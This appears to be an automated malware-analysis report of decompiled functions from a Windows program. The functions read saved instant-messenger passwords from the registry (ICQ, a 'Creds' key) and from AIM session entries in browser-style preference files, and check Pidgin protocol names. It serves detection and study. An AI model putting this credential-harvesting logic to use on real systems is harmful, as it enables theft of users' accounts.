APIs

RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,?,?,004104FD,?,?,?,?), ref: 004100C8
memset.MSVCRT ref: 004100EA
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
LocalFree.KERNEL32(?), ref: 004101C5
RegCloseKey.ADVAPI32(?), ref: 004101D0
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
RegCloseKey.ADVAPI32(?), ref: 004101F8

Strings

%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 004100B2
ps:password, xrefs: 00410135
Creds, xrefs: 004100C0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
API String ID: 551151806-1288872324
Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8FD, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 100COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040E936
_strcmpi.MSVCRT ref: 0040E957

Strings

prpl-novell, xrefs: 0040E990
prpl-msn, xrefs: 0040E90F
prpl-oscar, xrefs: 0040E9AE
prpl-yahoo, xrefs: 0040E951
prpl-irc, xrefs: 0040E9EA
prpl-gg, xrefs: 0040E9CC
prpl-jabber, xrefs: 0040E972

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi
String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
API String ID: 1439213657-1061492575
Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F

Uniqueness

Uniqueness Score: -1.00%

Function 00408EAA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00408EAA(struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				intOrPtr _t29;
				struct HMENU__* _t31;
				intOrPtr* _t37;
				struct HWND__* _t41;
				struct HMENU__* _t46;

				0x414060();
				if(_a8 != 4) {
					if(_a8 == 5) {
						_t37 =  *0x41e390; // 0x0
						if(_t37 == 0) {
							L8:
							_push(_a12);
							sprintf(0x41e308, "dialog_%d");
							_t41 = CreateDialogParamA(_a4, _a12, 0, E00408EA5, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t41,  &_v4104, 0x1000);
							if(_v4104 != 0) {
								E00408CA1("caption",  &_v4104);
							}
							EnumChildWindows(_t41, E00408E37, 0);
							DestroyWindow(_t41);
						} else {
							while(1) {
								_t29 =  *_t37;
								if(_t29 == 0) {
									goto L8;
								}
								if(_t29 != _a12) {
									_t37 = _t37 + 4;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					_push(_a12);
					sprintf(0x41e308, "menu_%d");
					_t31 = LoadMenuA(_a4, _a12);
					 *0x41e1fc =  *0x41e1fc & 0x00000000;
					_t46 = _t31;
					_push(1);
					_push(_t46);
					_push(_a12);
					E00408D47();
					DestroyMenu(_t46);
				}
				return 1;
			}

0x00408eb2
0x00408ebc
0x00408f06
0x00408f0c
0x00408f17
0x00408f2d
0x00408f2e
0x00408f3b
0x00408f5c
0x00408f66
0x00408f6c
0x00408f7d
0x00408f89
0x00408f97
0x00408f9d
0x00408fa5
0x00408fac
0x00408f19
0x00408f27
0x00408f27
0x00408f2b
0x00000000
0x00000000
0x00408f1e
0x00408f24
0x00000000
0x00408f24
0x00000000
0x00408f1e
0x00000000
0x00408f27
0x00408fb3
0x00408fb3
0x00408ebe
0x00408ebe
0x00408ecb
0x00408ed9
0x00408edf
0x00408ee6
0x00408ee8
0x00408eea
0x00408eeb
0x00408eee
0x00408ef7
0x00408ef7
0x00408fb9

APIs

sprintf.MSVCRT ref: 00408ECB
LoadMenuA.USER32(?,?), ref: 00408ED9

Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF

DestroyMenu.USER32(00000000), ref: 00408EF7
sprintf.MSVCRT ref: 00408F3B
CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
memset.MSVCRT ref: 00408F6C
GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
DestroyWindow.USER32(00000000), ref: 00408FAC

Strings

caption, xrefs: 00408F92
dialog_%d, xrefs: 00408F31
menu_%d, xrefs: 00408EC1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
String ID: caption$dialog_%d$menu_%d
API String ID: 3259144588-3822380221
Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00409068, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00409068(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8) {
				void _v4103;
				char _v4104;
				int _t18;
				void* _t20;
				void* _t25;
				int _t27;
				void* _t29;

				0x414060();
				0x413d0c(0x41e200, _a8, _t25, _t29, _t20);
				0x413d0c(0x41e308, "general");
				E00408CA1("TranslatorName", 0x417c88);
				E00408CA1("TranslatorURL", 0x417c88);
				E00408CA1("Version", 0x417c88);
				EnumResourceNamesA(_a4, 4, E00408EAA, 0);
				EnumResourceNamesA(_a4, 5, E00408EAA, 0);
				0x413d0c(0x41e308, "strings");
				_t27 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t18 = LoadStringA(_a4, _t27,  &_v4104, 0x1000);
					if(_t18 > 0) {
						_t18 = E00408D0F(_t27,  &_v4104);
					}
					_t27 = _t27 + 1;
				} while (_t27 <= 0xffff);
				 *0x41e200 = 0;
				return _t18;
			}

0x00409070
0x00409080
0x00409090
0x004090a0
0x004090ab
0x004090b6
0x004090d1
0x004090db
0x004090e3
0x004090ee
0x004090f8
0x004090ff
0x00409107
0x00409113
0x0040911b
0x00409125
0x0040912b
0x0040912c
0x0040912d
0x00409137
0x00409140

APIs

_mbscpy.MSVCRT ref: 00409080
_mbscpy.MSVCRT ref: 00409090

Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01

EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
_mbscpy.MSVCRT ref: 004090E3
memset.MSVCRT ref: 004090FF
LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113

Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30

Strings

strings, xrefs: 004090DD
TranslatorName, xrefs: 0040909B
TranslatorURL, xrefs: 004090A6
Version, xrefs: 004090B1
general, xrefs: 00409085

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
String ID: TranslatorName$TranslatorURL$Version$general$strings
API String ID: 1035899707-2179912348
Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC

Uniqueness

Uniqueness Score: -1.00%

Function 0041102B, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097

Strings

Process32First, xrefs: 00411080
Module32First, xrefs: 0041105E
CreateToolhelp32Snapshot, xrefs: 0041104D
kernel32.dll, xrefs: 00411035
Process32Next, xrefs: 00411091
Module32Next, xrefs: 0041106F

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00405C4E(signed int _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct tagRECT _v68;
				void _v323;
				char _v324;
				intOrPtr _v4612;
				char _v8864;
				struct HWND__* _v10984;
				void* __ebx;
				_Unknown_base(*)()* _t75;
				void* _t78;
				struct HINSTANCE__* _t91;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr* _t106;
				intOrPtr _t107;
				void* _t109;
				void* _t110;

				0x414060();
				_v12 = 8;
				SetRect( &_v68, 1, 1, 1, 1);
				if(MapDialogRect( *(_a4 + 4),  &_v68) != 0) {
					_v12 = _v68.top << 2;
				}
				_v8 = _v8 & 0;
				_v32 = 0x3ed;
				_v28 = 0x3ef;
				_v24 = 0x3ee;
				_v20 = 0x3f0;
				asm("stosd");
				_v52 = 0xb02c;
				_v48 = 0xb090;
				_v44 = 0xb0f4;
				_v40 = 0xb158;
				asm("stosd");
				_t99 =  &_v8864;
				do {
					E00402AA8(_a4,  *((intOrPtr*)(_t109 + _v8 - 0x1c)));
					0x4134d0();
					_v8 = _v8 + 4;
					 *_t99 =  *((intOrPtr*)(_t109 + _v8 - 0x30));
					_t99 = _t99 + 0x854;
				} while (_v8 < 0x14);
				_v8 = _v8 & 0x00000000;
				do {
					_a4 = _a4 & 0x00000000;
					do {
						_t101 = _a4 * 0x854;
						_t106 = _t109 + _t101 - 0x2ae4;
						0x4135a8();
						if(_a4 == 0) {
							_v324 = 0;
							memset( &_v323, 0, 0xff);
							_push(E0040876F(_v8 + 0x515));
							sprintf( &_v324, "%s:");
							_t110 = _t110 + 0x18;
							SetWindowTextA(_v10984,  &_v324);
						}
						_t107 =  *_t106;
						_t91 = LoadLibraryA("shlwapi.dll");
						_t75 = GetProcAddress(_t91, "SHAutoComplete");
						if(_t75 != 0) {
							 *_t75(_t107, 0x10000001);
						}
						FreeLibrary(_t91);
						 *((intOrPtr*)(_t109 + _t101 - 0x229c)) =  *((intOrPtr*)(_t109 + _t101 - 0x229c)) + 1;
						_t78 = _v4612 + _v12;
						 *((intOrPtr*)(_t109 + _t101 - 0x22a0)) =  *((intOrPtr*)(_t109 + _t101 - 0x22a0)) + _t78;
						_a4 = _a4 + 1;
					} while (_a4 < 5);
					_v8 = _v8 + 1;
				} while (_v8 < 7);
				return _t78;
			}

0x00405c56
0x00405c66
0x00405c6d
0x00405c85
0x00405c8d
0x00405c8d
0x00405c95
0x00405c9b
0x00405ca2
0x00405ca9
0x00405cb0
0x00405cb7
0x00405cbb
0x00405cc2
0x00405cc9
0x00405cd0
0x00405cd7
0x00405cd8
0x00405cde
0x00405ce8
0x00405cf5
0x00405d01
0x00405d05
0x00405d07
0x00405d0d
0x00405d13
0x00405d17
0x00405d17
0x00405d1b
0x00405d1e
0x00405d24
0x00405d2b
0x00405d34
0x00405d44
0x00405d4b
0x00405d61
0x00405d6e
0x00405d73
0x00405d83
0x00405d83
0x00405d89
0x00405d96
0x00405d9e
0x00405da6
0x00405dae
0x00405dae
0x00405db1
0x00405db7
0x00405dc7
0x00405dd0
0x00405dd2
0x00405dd5
0x00405ddf
0x00405de2
0x00405df0

APIs

SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
MapDialogRect.USER32(?,?), ref: 00405C7D
memset.MSVCRT ref: 00405D4B
sprintf.MSVCRT ref: 00405D6E
SetWindowTextA.USER32(?,?), ref: 00405D83
LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
FreeLibrary.KERNEL32(00000000), ref: 00405DB1

Strings

SHAutoComplete, xrefs: 00405D98
%s:, xrefs: 00405D68
shlwapi.dll, xrefs: 00405D8B

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
String ID: %s:$SHAutoComplete$shlwapi.dll
API String ID: 2601263068-2802052640
Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00411BA1, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63librarystringloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
strlen.MSVCRT ref: 00411C15
strlen.MSVCRT ref: 00411C22

Strings

LdrGetProcedureAddress, xrefs: 00411BEB
GetProcAddress, xrefs: 00411BC9, 00411BCE
ntdll.dll, xrefs: 00411BE4
PJ@, xrefs: 00411BA4, 00411BD5, 00411C29
kernel32.dll, xrefs: 00411BBC

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
API String ID: 1027343248-251837621
Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94

Uniqueness

Uniqueness Score: -1.00%

Function 004121C1, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00412234

Strings

Startup, xrefs: 004121EC
Common Startup, xrefs: 00412227
Favorites, xrefs: 004121F3
Desktop, xrefs: 004121DE
Programs, xrefs: 004121FA
Common Desktop, xrefs: 00412220
AppData, xrefs: 00412219
Common Programs, xrefs: 0041222E
Common Start Menu, xrefs: 00412201
Start Menu, xrefs: 004121E5

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 714388716-318151290
Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E293, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 167
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040E293(void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				char _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v284;
				char _v540;
				void _v1553;
				void _v1563;
				char _v1564;
				void _v2588;
				char _v3611;
				void _v3612;
				void* __ebx;
				void* __edi;
				void* _t52;
				int _t57;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t83;
				intOrPtr* _t88;
				intOrPtr _t105;
				char _t107;
				void* _t109;
				int _t113;
				long _t116;
				void* _t117;
				void* _t118;
				intOrPtr* _t119;
				void* _t120;

				_t52 = E004067BA(_a8);
				_pop(_t95);
				_v8 = _t52;
				if(_t52 != 0xffffffff) {
					_t116 = GetFileSize(_t52, 0);
					if(_t116 < 0x100000) {
						_t3 = _t116 + 1; // 0x1
						_t57 = _t3;
						0x413d5c();
						_t109 = _t57;
						 *_t119 = 0x3ff;
						_v16 = _t109;
						_v12 = 0;
						_v1564 = 0;
						memset( &_v1563, 0, _t57);
						_t120 = _t119 + 0xc;
						 *_t109 = 0;
						ReadFile(_v8, _t109, _t116,  &_v20, 0);
						 *((char*)(_t109 + _t116)) = 0;
						while(1) {
							_t64 = E00407193(_t109, _t95,  &_v1564, 0x3ff,  &_v12);
							_t120 = _t120 + 0xc;
							if(_t64 == 0) {
								break;
							}
							_t66 = E00407139(0, "user_pref("");
							_pop(_t95);
							if(_t66 == 0) {
								_push(0x417ddc);
								_t67 = 0xb;
								_t13 = E00407139(_t67) - 0xb; // -11
								_t95 = _t13;
								_a8 = _t95;
								if(_t95 > 0) {
									_t117 = E00407139(E00407139(_t68 + 1, 0x417de4) + 1, 0x417ddc);
									_pop(_t95);
									if(_t117 > 0) {
										_t17 = _t117 + 1; // 0x1
										_t113 = E00407139(_t17, 0x417ddc) - _t117 - 1;
										_pop(_t95);
										if(_t113 > 0) {
											memcpy( &_v2588,  &_v1553, _a8);
											 *((char*)(_t118 + _a8 - 0xa18)) = 0;
											memcpy( &_v3612, _t118 + _t117 - 0x617, _t113);
											_t95 =  &_v2588;
											 *((char*)(_t118 + _t113 - 0xe18)) = 0;
											_t83 = E00407139(0, ".aim.session.password");
											_t120 = _t120 + 0x1c;
											if(_t83 > 0) {
												 *((char*)(_t118 + _t83 - 0xa18)) = 0;
												_v540 = 0;
												_v284 = 0;
												_v28 = 0;
												_v24 = 0;
												E00406958(0xff,  &_v540,  &_v2588);
												E004029D9( &_v3611,  &_v284, 0xff);
												_t107 = _v540;
												_t105 = 2;
												_v28 = _t105;
												_t88 =  &_v540;
												while(_t107 != 0) {
													if(_t107 < 0x30 || _t107 > 0x39) {
														_v24 = _t105;
													} else {
														_t88 = _t88 + 1;
														_t107 =  *_t88;
														continue;
													}
													L15:
													_t95 = _a4;
													 *((intOrPtr*)( *_a4))( &_v540);
													goto L16;
												}
												_v24 = 3;
												goto L15;
											}
										}
									}
								}
							}
							L16:
							_t109 = _v16;
						}
						0x413d56(_t109);
					}
					CloseHandle(_v8);
				}
				return 1;
			}

0x0040e2a2
0x0040e2aa
0x0040e2ab
0x0040e2ae
0x0040e2be
0x0040e2c6
0x0040e2cc
0x0040e2cc
0x0040e2d0
0x0040e2d5
0x0040e2d7
0x0040e2e6
0x0040e2e9
0x0040e2ec
0x0040e2f2
0x0040e2f7
0x0040e304
0x0040e306
0x0040e30c
0x0040e47a
0x0040e48c
0x0040e491
0x0040e496
0x00000000
0x00000000
0x0040e321
0x0040e328
0x0040e329
0x0040e334
0x0040e337
0x0040e344
0x0040e344
0x0040e34b
0x0040e34e
0x0040e372
0x0040e377
0x0040e378
0x0040e37e
0x0040e391
0x0040e394
0x0040e395
0x0040e3ac
0x0040e3b4
0x0040e3cb
0x0040e3d7
0x0040e3dd
0x0040e3e4
0x0040e3e9
0x0040e3ee
0x0040e3f4
0x0040e401
0x0040e407
0x0040e40d
0x0040e410
0x0040e41f
0x0040e431
0x0040e436
0x0040e440
0x0040e441
0x0040e444
0x0040e459
0x0040e44f
0x0040e466
0x0040e456
0x0040e456
0x0040e457
0x00000000
0x0040e457
0x0040e469
0x0040e469
0x0040e475
0x00000000
0x0040e475
0x0040e45d
0x00000000
0x0040e45d
0x0040e3ee
0x0040e395
0x0040e378
0x0040e34e
0x0040e477
0x0040e477
0x0040e477
0x0040e49d
0x0040e4a2
0x0040e4a6
0x0040e4a6
0x0040e4b3

APIs

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
memset.MSVCRT ref: 0040E2F2
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
memcpy.MSVCRT ref: 0040E3AC
memcpy.MSVCRT ref: 0040E3CB
??3@YAXPAX@Z.MSVCRT ref: 0040E49D
CloseHandle.KERNEL32(?), ref: 0040E4A6

Strings

user_pref(", xrefs: 0040E314
.aim.session.password, xrefs: 0040E3D0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
String ID: .aim.session.password$user_pref("
API String ID: 1009687194-2166142864
Opcode ID: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
Opcode Fuzzy Hash: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D794, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 122
registryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040D794(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				char _v12;
				int _v16;
				void* _v20;
				long _v24;
				int _v28;
				char _v44;
				void _v303;
				char _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				char _v568;
				char _v824;
				void _v1079;
				int _v1080;
				void* __ebx;
				void** _t45;
				char* _t49;
				long _t51;
				long _t55;
				long _t62;
				long _t68;
				int _t70;
				int _t76;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t45 =  &_a8;
				_v24 = 1;
				0x411d68(_a8, "Software\Mirabilis\ICQ\NewOwners", _t45);
				_t79 = _t78 + 0xc;
				if(_t45 == 0) {
					_t70 = 0;
					_v12 = 0;
					_v304 = 0;
					memset( &_v303, 0, 0xff);
					_t80 = _t79 + 0xc;
					_t49 =  &_v304;
					_push(_t49);
					_push(0);
					while(1) {
						0x411dee(_a8);
						_t81 = _t80 + 0xc;
						if(_t49 != 0) {
							break;
						}
						_t51 =  &_v304;
						0x411d68(_a8, _t51,  &_v20);
						_t80 = _t81 + 0xc;
						__eflags = _t51;
						if(_t51 != 0) {
							L10:
							_t38 =  &_v12;
							 *_t38 = _v12 + 1;
							__eflags =  *_t38;
							_t49 =  &_v304;
							_push(_t49);
							_push(_v12);
							continue;
						} else {
							_v16 = 0x10;
							_t55 = RegQueryValueExA(_v20, "MainLocation", _t70,  &_v28,  &_v44,  &_v16);
							__eflags = _t55;
							if(_t55 != 0) {
								L9:
								RegCloseKey(_v20);
								goto L10;
							} else {
								_t76 = atoi( &_v304);
								__eflags = _t76 - _t70;
								if(_t76 <= _t70) {
									goto L9;
								} else {
									__eflags = _v16 - 8;
									if(__eflags < 0) {
										goto L9;
									} else {
										_v1080 = _t70;
										memset( &_v1079, _t70, 0xff);
										_t80 = _t80 + 0xc;
										_t62 = E0040807D( &_v1080, __eflags, _t76, _a12,  &_v44, _v16);
										__eflags = _t62;
										if(_t62 == 0) {
											L8:
											_t70 = 0;
											__eflags = 0;
											goto L9;
										} else {
											_v824 = 0;
											_v568 = 0;
											_v312 = 0;
											_v308 = 0;
											0x413d0c( &_v568,  &_v1080);
											0x413d0c( &_v824,  &_v304);
											_t80 = _t80 + 0x10;
											_v308 = 3;
											_v312 = 8;
											_t68 =  *((intOrPtr*)( *_a4))( &_v824);
											__eflags = _t68;
											_v24 = _t68;
											if(_t68 != 0) {
												goto L8;
											}
										}
									}
								}
							}
						}
						break;
					}
					RegCloseKey(_a8);
				}
				return _v24;
			}

0x0040d7a0
0x0040d7ac
0x0040d7b3
0x0040d7b8
0x0040d7bd
0x0040d7c3
0x0040d7d3
0x0040d7d6
0x0040d7dc
0x0040d7e1
0x0040d7e4
0x0040d7ea
0x0040d7eb
0x0040d90f
0x0040d912
0x0040d917
0x0040d91c
0x00000000
0x00000000
0x0040d7f5
0x0040d7ff
0x0040d804
0x0040d807
0x0040d809
0x0040d902
0x0040d902
0x0040d902
0x0040d902
0x0040d905
0x0040d90b
0x0040d90c
0x00000000
0x0040d80f
0x0040d824
0x0040d82b
0x0040d831
0x0040d833
0x0040d8f9
0x0040d8fc
0x00000000
0x0040d839
0x0040d845
0x0040d847
0x0040d84a
0x00000000
0x0040d850
0x0040d850
0x0040d854
0x00000000
0x0040d85a
0x0040d863
0x0040d869
0x0040d86e
0x0040d882
0x0040d887
0x0040d889
0x0040d8f7
0x0040d8f7
0x0040d8f7
0x00000000
0x0040d88b
0x0040d89b
0x0040d8a1
0x0040d8a7
0x0040d8ad
0x0040d8b3
0x0040d8c6
0x0040d8d0
0x0040d8da
0x0040d8e4
0x0040d8ee
0x0040d8f0
0x0040d8f2
0x0040d8f5
0x00000000
0x00000000
0x0040d8f5
0x0040d889
